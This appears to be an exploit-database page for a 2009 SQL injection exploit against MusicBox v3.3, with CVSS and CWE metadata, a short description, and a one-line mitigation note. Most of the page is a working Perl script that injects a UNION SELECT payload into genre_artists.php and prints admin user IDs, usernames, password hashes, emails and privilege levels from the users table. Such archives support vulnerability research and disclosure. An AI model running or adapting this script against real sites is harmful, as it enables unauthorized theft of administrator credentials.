header-logo
Suggest Exploit
vendor:
MusicBox
by:
Ctacok
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MusicBox
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MusicBox v 3.3 SQL INJECTION EXPLOIT

This exploit is used to gain access to the MusicBox v 3.3 application. It uses a union select statement to concatenate the userid, username, password, email, and userlevel from the users table. The exploit is written in Perl and can be used with the host and path as arguments.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

#!/usr/bin/perl 
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT                       #\n";
print "# Author: Ctacok  (Russian)                                  #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
print "##############################################################\n";
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
print "\n userlevel 9 = SuperAdmin ";
print "\n pass = md5($pass)";
if (@ARGV < 2)
{
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){
        print "\n[+] Admin id: : $1";
                print "\n[+] Admin username: $2";
                print "\n[+] Admin password: $3";
                print "\n[+] Admin email: $4";
                print "\n[+] Admin userlevel: $5";
}else{
                print "\n My name is Fail, Epic Fail... \n"
}

Navigation

Suggest Exploit

Services By CQR